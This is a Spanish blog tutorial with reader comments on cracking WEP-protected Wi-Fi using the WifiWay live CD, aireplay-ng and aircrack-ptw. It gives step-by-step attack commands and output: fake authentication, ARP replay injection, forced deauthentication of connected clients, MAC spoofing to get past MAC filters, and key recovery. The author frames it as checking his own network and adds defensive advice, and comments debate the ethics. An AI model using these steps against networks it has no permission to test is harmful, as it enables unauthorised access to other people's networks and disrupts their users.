Hack de una WEP

Improvisa :: Informática :: Hack de una WEPEn este pequeño "experimento" decidí comprobar la seguridad de mi red, ya sabía yo que no valía para nada, pero quería comprobar por mi mismo que era así.

Con este manual intentaremos demostraros lo fácil que es que os rompan la clave WEP de vuestra red inalámbrica. Hablaremos de como realizar este hack con inyección de paquetes ARP con la tarjeta Intel 3945 ABG, posibles errores y como no, posibles soluciones. También lo he conseguido con las tarjetas con chipset Zydas.

Por daros una idea de lo simple que es, a una distancia medio razonable, un par de centenar de metros, una conexión de un cliente autenticado y unos 10 minutos nos bastarán para hackear cualquier WEP de cualquier longitud, a mayor longitud de clave WEP algo más de tiempo.

Sin más pongamonos manos a la obra:­

Para el experimento hemos utilizado la distribución en CD LIVE de www.seguridadwireless.net concretamente la distribución se llama wifiway 0.6 (ya existe la versión 0.8, y la he probado, es facilisimo con el script airoway.sh, lo cuento más abajo) y podemos descargarla de estos dos sitios, recomiendo el segundo (bastante más rápido):

ftp://files.tuto-fr.com:8080/distro/wifiway-0.6.iso
http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso

Una vez que tenemos descargada y quemada la nueva distribución la meteremos en nuestro portatil, debe tener la tarjeta Intel 3945 ABG con la que seremos capaces de inyectar paquetes, lo bueno de esta tarjeta es que a día de hoy viene en un montón de portátiles.

El fallo que le he visto a la distribución es que debemos saber de antemano cual será nuestro objetivo, ya que una vez que entramos a WifiWay 0.6 debemos saber el canal que queremos atacar. Podemos por ejemplo saber esto con swscanner (netstumbler para linux, de Ivan Forcada) o con netstumbler (para windows), una vez que tenemos el canal del objetivo arrancamos WifiWay.

Despues de haberle dicho nuestra zona de tiempo y nuestro idioma, nos dejara en una consola, pulsad ahí "startx", nos arrancara las X de la distribución.

Lo curioso de la distribución es que divide la tarjeta Intel 3945 ABG en dos interfaces, la rtap0 para escuchar en modo monitor y la wifi0 para inyectar código al AP Objetivo.

Como ya sabemos el canal del objetivo es hora de lanzar el script que nos trae para la configuración de nuestra tarjeta, abriremos una consola y teclearemos:

wifiway:/# ipw3945_es.sh

Nos preguntará el canal, el que hayamos sacado con swscanner
No preguntará el Rate de captura, siempre a 2
Y por ultimo la MAC del AP Objetivo: yo aquí de primeras le doy la 00:11:22:33:44:55

Ahora lanzamos en la misma consola:

wifiway:/# airodump-ng rtap0

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47 
                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
 00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              NETGEAR                        
 00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear                           
                                                                                                           
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                           
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51     2       14
 (not associated)   00:14:A4:3F:8D:13   19     0        4  mossy
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5

 

Debemos apuntar (o copiar seleccionando, para los no iniciados en linux, copiar se hace simplemente seleccionando y pegar con los dos botones a la vez del ratón) la MAC del AP Objetivo y su ESSID.

Lancemos de nuevo el script para la tarjeta Intel 3945 ABG, pero esta vez diciéndole la MAC del AP de verdad:

wifiway:/# ipw3945_es.sh

Canal: El correspondiente al AP Objetivo
Rate : 2
MAC : MAC del AP Objetivo

Ya tenemos preparada la tarjeta para empezar a inyectar código, tecleando en la misma consola los siguientes códigos, mandaremos con nuestra Intel 3945 ABG un paquetito de asociación al AP Objetivo:

wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful 🙂

Acabamos de ver que se ha autenticado contra el AP, es decir aceptará todo lo que le mandemos siempre y cuando vaya encriptado con la wep, lo que haremos ahora será capturar paquetes encriptados y reenviarlos de nuevo al AP, previa copia en nuestro disco duro para posterior análisis:

wifiway:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0

Saving ARP requests in replay_arp-0219-123051.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets…

Ahora es momento de abrir otra consola y poner a capturar a airodump:

wifiway:/# airodump-ng -w /tmp/dump rtap0

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47 
                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
 00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              NETGEAR                        
 00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear                           
                                                                                                           
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                           
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51     2       14
 (not associated)   00:14:A4:3F:8D:13   19     0        4  mossy
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5

 

Vale debemos esperar a que la primera consola, en la que está corriendo el aireplay -3 a que capture algún paquete ARP y en cuanto lo haga empezará a inyectar para generar tráfico encriptado con la clave WEP del AP Objetivo. En cuanto esto ocurra en la segunda consola, en la que esta corriendo airodump, empezaremos a ver como el numero de paquetes DATA del Ap Objetivo empieza a subir.

Cuando debemos parar, buena pregunta, para claves de 64 bits con 200.000 paquetes DATA será suficiente, para claves de 128 bits, unos 400.000…. Como no sabemos de que tamaño es la clave podemos esperar a  tener 200.000 DATA y en una tercera consola, sin parar ninguna de las otras dos, ejecutar:

wifiway:/# aircrack-ptw /tmp/dump-01.cap

This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:19:5B:97:F3:64  keyindex=0
stats for bssid 00:19:5B:97:F3:64  keyindex=0 packets=21938
Found key with len 13: 44 44 44 44 44 44 44 44 44 44 44 44 44

Si nos da la clave ya podremos parar las otras consolas, si aun no nos la da seguiremos esperando…..

10 minutos despues……………

Seguro que ya la tenemos.

Con el Chipset de Zydas (Añadido el 9-Octubre-2007)

Con el chipset de Zydas es incluso más simple, no necesitaremos lanzar ningun script, directamente nos escuchara en todos los canales y autonegociará el Rate.

Debemos seguir todas las instrucciones que se siguen para el driver de Intel, dejar claro que el driver de Zydas NO divide la interfaz en rtap y wifi0. Nos lo dejara como eth2 o eth1, dependiendo de las interfaces que tengamos. Utilizaremos para todo la misma interfaz, la que tenga nuestra tarjeta con driver Zydas.

Problemas con los que nos podemos encontrar:

NO TENGO ESPACIO EN /tmp/:

Como os he dicho una vez que alguien conecte a ese AP lo tendremos en cuestión de 10 minutos, pero hasta que alguien conecte pueden pasar horas incluso días, el problema que nos encontramos al lanzar airodump-ng -w /tmp/dump rtap0 es que tenemos poco espacio, no hay problema WifiWay monta por defecto nuestras particiones NTFS o FAT32, las deja en /mnt/sda…. Lancemos (en mi caso, tengo una carpeta llamada comparto en mi segunda particion NTFSm ahí si que hay gigas):

wifiway:/# airodump-ng -w /mnt/sda5/comparto/dump rtap0

Con esto podemos esperar hasta semanas a que el AP Objetivo reciba una conexión.

NO ASOCIA CON aireplay-ng -1 0

Muy bien se puede deber a un par de cosas, por lo que a mi me ha ocurrido.

No tenemos la señal suficiente (esto deberiamos saberlo con swscanner o netstumbler), sigue intentandolo, pero te aseguro que la distancia es importante, despues lo tendrás bastante fastidiado en la inyección de paquetes, veras que no suben :-(, intenta acercarte.

Si estas seguro de tener señal suficiente, entonces seguramente el AP tenga Filtro MAC, no ocurre nada, podremos HAckearlo exactamente igual, con un par de trucos:

Si os fijáis airodump tiene dos apartados, uno para APS Objetivos (la parte de arriba) y otra parate de clientes conectados (la de abajo), cuestión de esperar a que un cliente con una mac valida se conecte al AP Objetivo y genere trafico, de esta forma sabremos que la MAC es valida para el AP, copiaremos esa MAC y cambiaremos la nuestra por la del cliente con este código:

wifiway:/# ifconfig wifi0 hw ether MAC_CLIENTE_AUTENTICADO

Ahora debemos comenzar el proceso exactamente igual pero poniendo nuestra "nueva" MAC.

INYECTA ARP PERO NO SUBEN LOS DATA

Casi seguro que es por distancia, en un par de experimentos me ha ocurrido eso, no sube o sube muy lento en relación con los paquetes ARP inyectados, es cuestión de distancia, los paquetes enviados al AP no le llegan.

Mi consejo es que vayáis probando con la vuestra y luego con alguna otra 😉

Si alguien tiene algún problema más que lo vaya escribiendo en el FORO e iremos intentando resolver todas las dudas.

El caso es que el AP al que estamos conectandonos nos desautentica, se soluciona volviendo a asociarse con:

wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0

Podemos utilizar el truco de Tase, podemos poner en la linea de comando lo siguiente:

wifiway:/# while [true] do aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0; sleep 180 done

HAY DATA PERO NO ARP

Esto se debe a que cuando te has puesto a inyectar paquetes el cliente ya estaba conectado y no genera paquetes ARP, hay dos soluciones, una es esperar a que vuelva a conectarse y otra segunda es enviar un paquete de falsa desautenticación al AP para que desconecte al cliente que está asociado y de esa forma el cliente tenga que volver a asociarse, generando de esta forma paquetes ARP para su posterior inyección, para hacerlo debemos teclear en una consola nueva lo siguiente, sin cancelar ninguna de las otras (bendito aireplay-ng ;-)):

wifiway:/# aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENTE_A_DESAUTENTICAR wifi0

 

CONVERSOR UNIVERSAL DE CODIFICACIONES 

He puesto en Improvisa un Conversor Universal para pasar de cualquier código a cualquier código, por si alguien quiere cambiar la clave de HEX. (que es como nos la va a dar aircrack-ptw)  a ASCII, podeis visitarlo aquí, tambien en la sección de Informática en el árbol de la izquierda.

Conversor Universal en Improvisa

SCRIPT AIROWAY.SH WN WIFIWAY 0.8:

El otro diá tuve la oprtunidad de probar el script airoway.sh en la versión de wifiway 0.8, increible, todo lo que hemos visto arriba de una forma totalmente automatizada, si tenemos suerte de que nuestra tarjeta este soportada al igual que nuestro hardware (no todo lo está con esta versión) nos ahorraremos mucho tiempo de tecleo.

Para utilizar el script airoway.sh iniciaremos las X como en la versión 0.6 de wifiway. Ejecutaremos tan pronto como nos sea posible el comando startx para iniciar las X.

Una vez abiertas las X abriremos un terminal y ahí ejecutaremos airoway.sh, el script nos abrirá 5 pantallas desde las que iremos ejecutando todos los procesos, tecleando un simple nuero en la 1ª pantalla, por ejmplo pulsaremos el numero 2 para autenticarnos contra el router, el tres para inyectar ARPs contra el routes. Para que lo entendais mejor os dejo un pantallazo de airoway.sh:

Improvisa :: Informática :: Hack de una WEP

Lo único que he visto malo es que el paso número 8, crackear la WEP, lo hace con aircrack y no con aircrack-ptw, pero no es problema una vez que tengamos los suficientes paquetes para aircrack-ptw podemos abrir una neva ventana de terminal y ejecutarlo a pelo, como explicabamos más arriba, lo unico que tendremos que hacer es encontrar donde están los .cap, que se habrán quedado donde en el mismo directorio que hemos qjecutado airoway.sh.

Una herramienta muy pero que muy útil, que si teneis oportunidad no dejeis de probar, acordaros airoway.sh.

SOLUCIONES PARA ASEGURAR NUESTRA WIFI:

Utilicemos, si nos es posible, WPA, bastante mas difícil de hackear (también es posible, a lo mejor el próximo experimento es con WPA).

Utiliza cable, no se porque pero los que conocen un poquitín el mundo del wifi siempre intentan tener cable 😉

La que mas me gusta es, comparte la wifi, la mayoría de nosotros estamos obsesionados con que no nos entren en la wifi, pero ¿por que?, podemos montarnos un NoCatSplash, la gente entrará a nuestra wifi con un ancho de banda máximo y encima le recibiremos con una pagina del tipo: "Está usted navegando gracias a la wifi del Vecino del 3º F, no me cobren la comunidad" o alguna gracias de esas ;-). Para montar NoCATSpalsh necesitaremos un Openwrt, y un hardware que lo soporte, unos 60 euros. Si no queremos gastarnos nada y tenemos un servidor también podemos hacerlo con Squid y CAPO, un plugin para Squid que funciona igual que NoCatSplash. Estas dos técnicas son las que utilizamos en la Red Inalámbrica de Guadalajara GuadaWireless.

Podeis utilizar el manual que hemos creado en Improvisa sobre Control de Ancho de Banda, es la opción que más me gusta.

Si alguien prueba con otras tarjetas en esta misma distribución y le funciona, id diciendonoslas para ir actualizando el documento.

Dudas en el Foro por favor.

Gracias a Alfonso de MicroAlcarria, me metió en el mundo del Wifi.
Gracias a Ivan Forcada por su magnífico swscanner.
Gracias a la gente de GuadaWireless.
Gracias al creador de los paquetes aircrack-ng
Gracias al creador de la distro WifiWay, seguridadwireless
Gracias a Tase, lo hicimos juntos.
Y a vosotros que iremos mejorando el documento con vuestras experiencias.
­

Comentarios

    Warning: Use of undefined constant type - assumed 'type' (this will throw an Error in a future version of PHP) in /home/improvisa_com/web/improvisa.com/public_html/wp-content/themes/grassland/comments.php on line 38
  • Juanmi dice:

    Comez en su dia nos habló de una distribución llamada BackTrack 2, el experimento lo incié con esa distribución, pero no fui capaz de inyectar código.

    Gracias Comez 😉

  • CeLSuM dice:

    Ayer mismo pudé comprobar como en mi casa Juanmi consiguió la WEP en apenas 15 minutos en hexadecimal y luego la convirtió a ASCII y tenía mi clave, así de simple. Como siempre aprendiendo cosas nuevas gracias a Juanmi… jejeje

    Salu2

  • Tase dice:

    Weno weno weno. Que interesante está esto 🙂 y que bien contado!

    Pues ya he abierto un nuevo hilo (pinchar aquí)
    sobre este tema. Para que quién quiera comente, lea y aprenda…

    Gracias Juantru.

  • Juanmi dice:

    Lo del ASCII es mera curiosidad, podemos meter tambien la clave en Hexadecimal.

    Aun asi he metido en Improvisa Un conversor de todo tipo de codificación a todo tipo de codificación, podeis visitarlo aquí:

    Conversor Universal en Improvisa

    Saludos

  • miembro dice:

    Pues a mi no me parece bien que se difundan estas cosas. El mago y el cerrajero nunca revelan sus trucos.

  • Devil dice:

    Interesante, interesante.

    Yo por lo general, siempre que instalo algun router a algun colega, se lo suelo filtrar mediante las identidades mac (además del WPA -WEP en su defecto- ). De esta forma, se puede evitar precisamente esto. La putada es que si los muy perretes quieren conectarse luego otro equipo y no tienen ni zorra de configurar el router para meter otra mac…, pues vamos jodidos jejejejeje.

    Muy guapo el artículo Juanmi.

  • Juanmi dice:

    Que razón tienes miembro, pero si no se difunde no se aprende:

    ¡¡¡¡ Conocimiento Libre !!!!

  • Juanmi dice:

    El filtro MAC no vale para nada Devil, leete en el artículo lo fácil que es saltarselo.

    La solución es compartirla 😉

    Besos.

  • Juanmi dice:

    De nada Tase, un placer 😉

  • DoMMiNNo dice:

    Se me antoja complicado como explicar la perplejidad que me ha generado leer esta noticia, no solo me ha parecido interesante, sino que además, para un lego en la materia, de esos que entienden cero o nada de estos temas, he conseguido entender cero coma cinco…

    Muy currada la explicación, de manual.

    Mi sincera ENHORABUENA!!!!

  • Juanmi dice:

    Buenísima respuesta, me he reido un buen rato, lo bueno es que haya llegado a sacar un 0,5 😉

    Gracias 😀

  • miembro dice:

    Pues yo no conozco a ningún cerrajero que vaya contado como se abren las puertas blindadas, ni a ningún caco que diga como abre un BMW320, ni a ningún furtivo que cuente donde coge los percebes. Una cosa es delinquir y otra invitar a ello.

  • Juanmi dice:

    Yo no invito a delinquir, es un «experiemento» del cual espero que saqueis vuestras propias conclusiones en cuanto a seguridad se refiere.

    Es como el ejemplo de la polvora, mira que cosas tan bonitas se pueden llegar a hacer (fuegos artificiales) y mira que cosas tan feas se pueden llegar a hacer (Guerra de Paz contra IRAK).

    Saca tus propias coclusiones pero no creo que el silencio ayude a nadie 😉

  • miembro dice:

    Por eso no tengo wifi, porque no me gusta que la gente «experimente» con mi pc. Mañana me meto por la ventana de la Paqui y si me pilla le digo que es un experimento(yo tb se hacer demagogia).-)

  • Juanmi dice:

    Te equivocas con la demagogia, tengo ADSL en Madrid (la cual comparto con toda la vecindad) y me conecto a la red de Internet en Guadalajara mediante la conexión compartida y gratuita de Guadawireless, no me hace falta para nada robarle a nadie el wifi, con lo cual para mi es un experimento hecho y derecho, que te apetece aparecer por casa de la Juani con un portatil, pues tu veras, pero para mi es lo que es, y no hagas demagogia que tu si que la haces.

    Saludos.

  • Tase dice:

    El hacking es lo que tiene: no todo el mundo lo ve bien. Y yo me apunto a la demagogia }-D y digo que robar ancho de banda al vecino está mal (y no digamos robarle el porno xD ) aunque bueno creo ocurren y colaboramos en cosas mucho peores. ¡This world sucks!

    Para mí por ejemplo es más importante colaborar con ONG’s y hay mucha pero mucha gente que lo ve una estupidez. ¡Son todas unas ladronas!

    Viva la demagogia

    Va otra: una conexión de ADSL de 3 mb es un a.b mensual de 700Gb rascar un pocos…

    No juzgues y no serás juzgado. Refranero oriental. :-0

    Besos pa los dos.

  • miembro dice:

    Que yo no me refería a ti en concreto chorra(aunque el que se pica ajos come), que ya se que lo compartes todo!! Lo de la demagogia va por la guerra de Irak, cipote.

  • Juanmi dice:

    Besos miembro, paces 😉

  • Juanmi dice:

    Las ONG no es que sean ladronas (que las hay) es que no creo que hagan bien global a ningún pais.

    ¿Te has preguntado si a algun director de alguna ONG le interesa que se acabe el hambre en Africa? ten en cuenta que se queda sin curro.

    Se que es una de las que mejor funciona pero ¿Te has preguntado si a Medicos sin Fornteras le interesa que se acabe la Malaria o la Lepra o llamalo como te de la gana en los paises menos privilegiados del mundo? Ten en cuenta que se quedan sin aventuras y sin palmadita en la espalda.

    La respuesta es obvia, ni una sola de las farmaceúticas ha dejado de ganar dinero comercializando sus medicamentos para el SIDA, por ejemplo, en África, sabiendo de sobra que una persona sin recursos no puede acceder a esos medicamentos.

    Otra pregunta, ¿Puede algún sistema de gobierno (el que te de la gana) competir contra la «Comida gratis» u operaciones del tipo «1 Kg. de comida para África»? A mi si me lo diesen gratis no lo compraría al vendedor de la esquina, con lo cual el vendedor de la esquina se conviertiria en perdedor de la esquina y asi es, como «el perro que se muerde la cola».

    Bueno cada uno que piense lo que quiera.

  • miembro dice:

    Que coño paces, esto es como el salsa rosa, hay que polemizar para que la gente escriba. DEMAGOGO!!!

  • Tase dice:

    «Las ONG no es que sean ladronas (que las hay) es que no creo que hagan bien global a ningún pais.»

    Hombre no sé si al país pero pero desde luego al chaval del poblado x de Madrid que le llevan a hacer actividades extrascolares pues supongo que le ayuda y al tio que tiene sida, y que antes no podía ni imaginarse acceder a la medicación y ahora puede, pues también supongo que le ayuda.

    «Se que es una de las que mejor funciona pero ¿Te has preguntado si a Medicos sin Fornteras le interesa que se acabe la Malaria o la Lepra o llamalo como te de la gana en los paises menos privilegiados del mundo? Ten en cuenta que se quedan sin aventuras y sin palmadita en la espalda.»

    Hombre yo creo que hasta que se acabe el curro para los de MSF queda mucho y no creo que ni el coordinador esté muy preocupado por eso. El tema de la palmadita, pues mira un médico en Spain gana fácilemente 3000€ al mes y si va con MFS no llega a 1000€ para mí está claro que se merece una palmadita porque renunciar a esa pasta e ir a vivir a sitios de dudosa comodidad y seguridad pues es de palmadita. Que muchos sólo lo hacen por eso, pues son un poco tontos porque hacer todo ese sacrificio para que yo les dé una palmadita cuando me lo cuenten… pero bueno más que yo por cambiar esto sí que hacen. Ene sto me importan más los actos que las causas, así que si van por su Dios, por que perdieron una pocha o por lo que sea me la suda, el caso es ¿qué hacen?(¿dan comida, enseñan a cultivar, les dan medios, hacen turismo?)

    «La respuesta es obvia, ni una sola de las farmaceúticas ha dejado de ganar dinero comercializando sus medicamentos para el SIDA, por ejemplo, en África, sabiendo de sobra que una persona sin recursos no puede acceder a esos medicamentos.»

    Sin duda.

    Otra pregunta, ¿Puede algún sistema de gobierno (el que te de la gana) competir contra la «Comida gratis» u operaciones del tipo «1 Kg. de comida para África»? A mi si me lo diesen gratis no lo compraría al vendedor de la esquina, con lo cual el vendedor de la esquina se conviertiria en perdedor de la esquina y asi es, como «el perro que se muerde la cola».

    Está claro que hay ayudas que más que ayudas son putadas :-). Pero bueno hay ONG’s para todos los gustos: unas van a dar catequesis y otras van a montar orfanatos a Polonia. Seguro que hay mucha gente que piensa: Un orfanato es responsabilidad de un país y si se lo haces tú pues pasta que se ahorra el Estado, sí seguro que muchos polacos pensaban eso mientras les sacaban a patadas de su tienda. Si no me toca a mi y otros piensan yo no voy a dar un pavo que son todos unos ladrones. Vamos al que le dan por culo es al niño, por culpa del Estado y no de nadie.

    «Bueno cada uno que piense lo que quiera.»

    Ese es el tema. La opionenes son como los culos, cada uno tiene el suyo. xD

  • knoppix dice:

    no hace falta bajar la distro?
    puedes instalar aircrack-ng y ya esta no?
    felicidades por el manual
    por otro lado yo creo que la gente tedriamos que tener todos un hotspot
    abierto y ceder el caudal de la adsl que nos sobra por que el 90% de la gente
    no usa ni el 10% de su adsl
    para mi es mas seguro tener un hotspot que caulquier encriptacion y ademas asi se quien se conecta y puede controlar el ancho de banda que me gastan
    y puede filtrar los contenidos,(p2p etc ..)para que no abusen claro

    otra cosa que tambien se puede hacer es apuntarte a redlibre,guadalajarawireless,guifi.net(en catalunya) o muchas otras comunidades wifi que hay en nuestro pais
    redes abiertas de verdad!

  • geremora dice:

    Utilice el articulo y obtuve el password de mi router en menos de 10 minutos.

    Muy buen articulo:
    Utilice wifiway 0.6 en un CD.
    Mi placa es la Intel 3945 ABG.
    Para extraer la mac y ESSID del AP objetivo utilice el Network Stumbler en Windows.

    Ahora estoy probando el wifislax y tambien el bactrack para ver como se comportan. El wifislax por lo que vi esta bastante bueno.

    Muchas gracias por el articulo.

    Saludos.

  • Juanmi dice:

    Jodo knoppix, acabo de leerte, un poco tarde 😉

    Totalmente de acuerdo contigo.

    Por cierto tambien me curre el documento para hacer el hotspot es este

    Saludos.

  • Juanmi dice:

    Mil gracias, un placer leerte, de veras, poca gente escribe para simplemente dar las gracias.

    Me alegro que te haya funcionado 😉

  • StIcKmAn dice:

    Hola, en primer luar muchas gracias por todo, el tutorial es muy útil para comprobar nuestra seguridad, pero, tengo un problema, todo va bien , empiezo a hacer reads pero no suben los arp, los data tambien llegan a subir pero al no subir los arp los paquetes IV no aumentan y no puedo desencriptar nada, alguna solucion??

  • Tase dice:

    Es imprescindible que haya un cliente correctamente conectado (que tenga la cable y «el portatil» encendido), si hay cliente puedes esperar un rato o desautenticarlo (preferiblemente). Si no hay cliente, dejalo lanzado y a esperar a que se conecte… a veces se tarda días…

    Salu2

  • jclpalomo dice:

    Buenas tardes,

    he intentado seguir tu magnífico tutorial y en el primer paso ya me encuentro un problema.

    Te pongo en antecedentes :

    He comprobado que tengo una Intel 3945 

    He arrancado el PC con el wifiway 1.0 y después de configurar el idioma y teclear startx he abierto una consola.

    En ella he tecleado ipw3945_es.sh y me sale el siguiente mensaje:

    "bash: ipw3945_es.sh: command not found ". 

    No me pide el canal, el rate y la direeción mac.

    También he tecleado el comando airodump-ng rtap0 y me responde "Interface rtap0:ioctl (SIOCGIFINDEX) failed: no such device"

    ¿Qué tengo que hacer para ejecutar estos dos pasos y poder continuar?

    En espera de una respuesta, recibe mi agradecimiento por adelantado.

     

    Un cordial saludo 

     

  • Juanmi dice:

    En la version 1.0 de wifiway ya no está ese script 😉

    Utiliza airoway.sh es muchísimo mejor 😉 creo que viene preparado para la ipw3945.

    Si  ves que no te tira comprueba en el script que estan bien configuradas las interfaces de injection y monitor, para saber donde está el script utiliza whereis airoway.sh

    Saludos y ya nos cuentas 😉

  • plataser dice:

    Hola.

     Este fue el primer tutorial y es sobre el que me he guiado siempre, pero el caso que ahora tengo un usb zydas y cuando le haces el airodump-ng para buscar las redes disponibles no me marca el PWR, se queda a 00. Si lo ignoro y continuo con el proceso, cuando voy a autenticarme con la red con aireplay-ng  se queda Sending Authentication Request, continuamente aparece la misma frase y a las 10 veces se para y tengo que lanzar de nuevo el comando pero sucede lo mismo. Al no hacer autenticacion al continuar con los pasos no hacen la funcion que deberia.

     Esto ha sido probado con diferentes usb de zydas, en wifiway 2.0 livecd y en ubuntu instalado en el ordenador, sucede de igual forma en todos.

    Probado en diferentes ordenadores con Wifiway 2.0 y con la tarjeta mia intel 3945abg funciona siempre bien.

    Como es posible que se pueda poner la tarjeta en modo monitor y despues no realice el proceso? Es problema de drivers o realmente no esta en modo monitor aunque diga que si?

     Espero que me podais responder, muchas gracias.

  • Juanmi dice:

    El caso es que a mi con el chipset de Zydas me ocurre los mismo pero cambian algunas cosas, por ejemplo con ipw3945abg no me da el power pero si lo hace con la del chipset de zydas. Con el chipset de zydas hay veces que me hace los mismo que a ti, no me deja autenticarme en el router, esto no me ocurre en todas las ocasiones,  depende de los routers que intento hackear.

    Otra cosa es que yo ya no utilizo el manual que cree, utilizo la version 0.8 de wifiway y el magnífico comando airoway.sh, pruebalo con este comando a ver que te ocurre y nos cuentas.

    Saludos y encantado de veolver a verte plataser.